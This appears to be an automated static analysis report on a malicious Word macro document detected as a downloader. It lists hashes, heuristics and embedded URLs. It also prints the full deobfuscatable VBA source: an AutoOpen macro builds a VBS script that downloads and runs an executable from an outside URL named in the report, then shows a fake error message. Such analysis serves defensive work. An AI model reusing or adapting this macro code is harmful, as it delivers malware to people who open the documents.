Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f02b27a1a9cff684…

MALICIOUS

Office (OOXML)

28.5 KB Created: 2016-12-05 07:29:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2017-02-23
MD5: 79e74de0058bc4e8dfcb8ae4327efa37 SHA-1: b26b0d13c0a1f56740e9dc080d4589c20ae00121 SHA-256: f02b27a1a9cff684dfeae1d80d836c95aae861806af024d258f3be354963abc7
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for malicious documents. The critical heuristic 'OLE_VBA_SHELL' indicates a potential shell execution, and the ClamAV detection 'Doc.Downloader.Valyria-6923204-0' confirms its malicious nature. The VBA script likely uses the Shell function to download and execute a second-stage payload from the URL found in the document body.

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-6923204-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6923204-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Public Sub sjgswwk7ajrxj6JhvblfrrJNj(eewlMb6oOXNUx76mwN7fXq2j6)
Shell eewlMb6oOXNUx76mwN7fXq2j6, 1
End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Public Sub AutoOpen()
k57e65M65q8Gap60ofR62ia
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://shalommovers.com/CSS/Layout.exe\ In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7137 bytes
SHA-256: eefa4a970baccce2361939f6da03667af8aba86ec274047ca372ab46280867cb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub AutoOpen()
k57e65M65q8Gap60ofR62ia
End Sub
Private Sub dSnbcWugleoKkpq40np5kt()
Dim pce
Dim u4b
Dim hf7
Dim x
Dim st
Dim QPw, QPw1
Dim oIT
pce = u4b - 268
pce = oIT - 283
hf7 = st + 105
QPw = QPw + QPw - 176
oIT = x - QPw1 - u4b
x = hf7 + 7 + x - 114
hf7 = hf7 - 99
pce = hf7 - u4b - u4b
u4b = QPw - 54 - 235

End Sub

Public Sub sjgswwk7ajrxj6JhvblfrrJNj(eewlMb6oOXNUx76mwN7fXq2j6)
Shell eewlMb6oOXNUx76mwN7fXq2j6, 1
End Sub
Private Sub bbhxjjFFlac5EkcVeAhhq0()
Dim t7
t7 = t7 - t7 + t7 - 27
t7 = t7 - 274 - 282
t7 = t7 + t7
t7 = t7 - 249 - 164
t7 = t7 + t7
t7 = t7 + 101 + 59 - t7
t7 = t7 + 91

End Sub

Function Rdvo2aFgq6XrRGnnpdjcvWm() As String
Dim elukagOsghdmmvmodPDbohdl As Range
Dim o37w5oaTqrvrXw6x5qkqG8r3 As String, swbmWbBdHiImOkmxklxfs81gu As String
Dim hunASnrsFqcM68K43eRsbo6c As String
o37w5oaTqrvrXw6x5qkqG8r3 = cKhsDpjXqG27P8j2iS1fuAcp("QAMC40hQAMC40ttp")
swbmWbBdHiImOkmxklxfs81gu = cKhsDpjXqG27P8j2iS1fuAcp("\")
Set elukagOsghdmmvmodPDbohdl = ActiveDocument.Content
elukagOsghdmmvmodPDbohdl.Find.ClearFormatting
elukagOsghdmmvmodPDbohdl.Find.Replacement.ClearFormatting
With elukagOsghdmmvmodPDbohdl.Find
.Text = o37w5oaTqrvrXw6x5qkqG8r3 & "*" & swbmWbBdHiImOkmxklxfs81gu
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindStop
.Format = False
.MatchWholeWord = False
.MatchWildcards = True
.MatchAllWordForms = False '
End With
elukagOsghdmmvmodPDbohdl.Find.Execute
 hunASnrsFqcM68K43eRsbo6c = elukagOsghdmmvmodPDbohdl.Text
 hunASnrsFqcM68K43eRsbo6c = Left(hunASnrsFqcM68K43eRsbo6c, Len(hunASnrsFqcM68K43eRsbo6c) - 2)
hunASnrsFqcM68K43eRsbo6c = Replace(hunASnrsFqcM68K43eRsbo6c, Chr(13), "")
 Rdvo2aFgq6XrRGnnpdjcvWm = Trim(hunASnrsFqcM68K43eRsbo6c)
End Function
Private Sub qWUHwQrJpM5g88ti1nf3q2()
Dim dvJ
Dim DSl, DSl1
Dim ptF
Dim lSj
Dim cmh, cmh1
Dim Luc
Dim wat, wat1
Dim wpw
dvJ = wat1 + lSj + cmh - 295
cmh = Luc - 275 - 131 - lSj
wat1 = cmh + wat + 165
dvJ = cmh + 147 + wpw

End Sub

Function w1rikXaoca1sa78s7xDxrF()
w1rikXaoca1sa78s7xDxrF = """"
End Function
Private Sub vT5qeLbnmwthrBg2f5wCgxrB()
Dim mPt
Dim ldg, ldg1
Dim EPR
Dim eDi, eDi1
EPR = eDi1 + eDi1
ldg = eDi1 + mPt + ldg
mPt = ldg + EPR
EPR = mPt - EPR
eDi = mPt + 37 - mPt - ldg1
mPt = mPt - eDi1 + 131 + ldg
ldg = ldg1 - 41 + 200
ldg = eDi1 - 114 - mPt
eDi = mPt + EPR + eDi1 + 118
ldg1 = EPR + eDi1 - 293
mPt = ldg + 257

End Sub

Private Sub k57e65M65q8Gap60ofR62ia()
Dim A4uiugglahxlhn1mKpANdj, oio0awvHJPd2cfuw7Whw0fBB
A4uiugglahxlhn1mKpANdj = cKhsDpjXqG27P8j2iS1fuAcp("QAMC40" & ".vbs")
Open A4uiugglahxlhn1mKpANdj For Output As #2
oio0awvHJPd2cfuw7Whw0fBB = cKhsDpjXqG27P8j2iS1fuAcp("e = QAMC40g(" & w1rikXaoca1sa78s7xDxrF & "errQAMC40oQAMC40r/*/QAMC40./*/bat" & w1rikXaoca1sa78s7xDxrF & "): SeQAMC40tQAMC40 a QAMC40= COQAMC40(" & w1rikXaoca1sa78s7xDxrF & "M/QAMC40*/S/*QAMC40/X/*/M/*/L/*QAMC40/2/*/.S/*QAMC40/QAMC40er/*QAMC40/ve/*QAMC40/rQAMC40/*/XM/*/LH/*/QAMC40TT/*QAMC40/P" & w1rikXaoca1sa78s7xDxrF)
oio0awvHJPd2cfuw7Whw0fBB = oio0awvHJPd2cfuw7Whw0fBB & cKhsDpjXqG27P8j2iS1fuAcp("QAMC40): a.open g(" & w1rikXaoca1sa78s7xDxrF & "G/*/E/*/QAMC40T/*/" & w1rikXaoca1sa78s7xDxrF & "), " & w1rikXaoca1sa78s7xDxrF)
oio0awvHJPd2cfuw7Whw0fBB = oio0awvHJPd2cfuw7Whw0fBB & Rdvo2aFgq6XrRGnnpdjcvWm
oio0awvHJPd2cfuw7Whw0fBB = oio0awvHJPd2cfuw7Whw0fBB & cKhsDpjXqG27P8j2iS1fuAcp(w1rikXaoca1sa78s7xDxrF & ", false: a.sQAMC40end()QAMC40: Set b = COQAMC40(" & w1rikXaoca1sa78s7xDxrF & "AQAMC40/*/D/*QAMC40/QAMC40O/*/D/QAMC40*QAMC40/BQAMC40/*/./*/QAMC40S/*/t/*/rQAMC40/QAMC40*QAMC40/e/*/QAMC40aQAMC40m" & w1rikXaoca1sa78s7xDxrF & "): b.OpeQAMC40n: b.QAMC40TypQAMC40e = 1 : QAMC40bQAMC40.Write a.ReQAMC40spo")
oio0awvHJPd2cfuw7Whw0fBB = oio0awvHJPd2cfuw7Whw0fBB & cKhsDpjXqG27P8j2iS1fuAcp("nsQAMC40eBody: QAMC40b.QAMC40PosiQAMC40tQAMC40ion = 0 : SQAMC40eQAMC40t c = CO(" & w1rikXaoca1sa78s7xDxrF & "S/*/c/QAMC40*/QAMC40riQAMC40pQAMC40ting/*/./*/FQAMC40/QAMC40*/i/*/l/*/e/QAMC40*/S/*/y/*/QAMC40s/QAMC40*QAMC40/t/*QAMC40/QAMC40eQAMC40/*/QAMC40m/*QAMC40/QAMC40O/*/QAMC40b/*QAMC40/QAMC40jQAMC40/*/e/*/ct" & w1rikXaoca1sa78s7xDxrF _
& "QAMC40): IQAMC40f cQAMC40.QAMC40Fileexists(e) Then c.DeQAMC40lQAMC40etQAMC40eFQAMC40ile QAMC40eQAMC40: EndQAMC40 If: bQAMC40.saQAMC40veToFQAMC40iQAMC40lQAMC40e eQAMC40: bQAMC40.CQAMC40lose: Dim QAMC40d: SQAMC40et dQAMC40 QAMC40= CO(" & w1rikXaoca1sa78s7xDxrF & "W/*/S/*QAMC40/QAMC40c/*/r/*/i/*QAMC40/p/*/t/QAMC40*/.QAMC40/*QAMC40/QAMC40S/*/h/*/e/*/lQAMC40l" & w1rikXaoca1sa78s7xDxrF)
oio0awvHJPd2cfuw7Whw0fBB = oio0awvHJPd2cfuw7Whw0fBB & cKhsDpjXqG27P8j2iS1fuAcp("): QAMC40d.Run(e)QAMC40: FQAMC40uncQAMC40tQAMC40ion cQAMC40o(NQAMC40ame)QAMC40 :QAMC40 set co = CQAMC40reateObQAMC40ject(g(QAMC40NaQAMC40me)): ENQAMC40d QAMC40fuQAMC40nQAMC40ction: FunQAMC40ction QAMC40g(f): QAMC40g QAMC40= ReplaQAMC40ce(f," & w1rikXaoca1sa78s7xDxrF & "/*/" & w1rikXaoca1sa78s7xDxrF & "," & w1rikXaoca1sa78s7xDxrF & "" & w1rikXaoca1sa78s7xDxrF & "):QAMC40 QAMC40eQAMC40nQAMC40d QAMC40function")
Print #2, oio0awvHJPd2cfuw7Whw0fBB
Close #2
sjgswwk7ajrxj6JhvblfrrJNj cKhsDpjXqG27P8j2iS1fuAcp("wQAMC40scriQAMC40pt " & w1rikXaoca1sa78s7xDxrF & A4uiugglahxlhn1mKpANdj & w1rikXaoca1sa78s7xDxrF)
Dim uodcTW24hiS0nMtsladofab As String
uodcTW24hiS0nMtsladofab = cKhsDpjXqG27P8j2iS1fuAcp("Windows QAMC40hpqs6v4eeXc8q1rhhasxicr")
Dim Nnn5dakhak5LaMfravrsqop As String
Dim hpqs6v4eeXc8q1rhhasxicr As Integer
Nnn5dakhak5LaMfravrsqop = cKhsDpjXqG27P8j2iS1fuAcp("FailQAMC40edQAMC40 QAMC40loQAMC40adQAMC40ing dQAMC40ocumQAMC40ent")
hpqs6v4eeXc8q1rhhasxicr = MsgBox(Nnn5dakhak5LaMfravrsqop, 16, uodcTW24hiS0nMtsladofab)
Application.Quit
End Sub
Private Sub L4venl2uJcWObhcwauBqsc()
Dim cde
Dim LNM, LNM1
Dim dqg
Dim bk1
Dim g87
Dim rcS
Dim fk5
bk1 = fk5 + 124
bk1 = cde - 257
bk1 = fk5 + 20 - bk1 - fk5
bk1 = LNM + 269
cde = cde + 236 + cde
fk5 = LNM - LNM1
g87 = LNM + LNM - 22 - 5
dqg = rcS - 274 + 37 - 180
g87 = bk1 + fk5 - cde
LNM1 = cde + 133 + rcS
cde = cde - LNM1 + 296 - LNM
LNM1 = LNM - LNM1 - 60

End Sub

Function cKhsDpjXqG27P8j2iS1fuAcp(s As String) As String
cKhsDpjXqG27P8j2iS1fuAcp = Replace(s, "QAMC40", "")
End Function
Private Sub wP2T1Hantt7Ksr52Den4JPw()
Dim txc
Dim o8i
Dim D7C
Dim sV6
D7C = D7C + sV6 + 18 + sV6
txc = txc + 153 - 37
txc = D7C - 87 + txc + txc
txc = o8i - 148 + D7C
o8i = o8i + D7C - txc
txc = o8i + txc - 216 - txc
sV6 = o8i + txc - 129
sV6 = o8i + D7C - 215

End Sub



Attribute VB_Name = "NewMacros"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{71B5A882-4416-47A7-94C5-6C8C684CCD16}{2EB4ABC9-E055-460A-A59E-C106EA7A6CDC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 26624 bytes
SHA-256: f44e71d499c85b3506aca70f5ff39354acb28b8b8ef0d099f3fea5babbf620f8
Detection
ClamAV: Doc.Downloader.Valyria-6923204-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.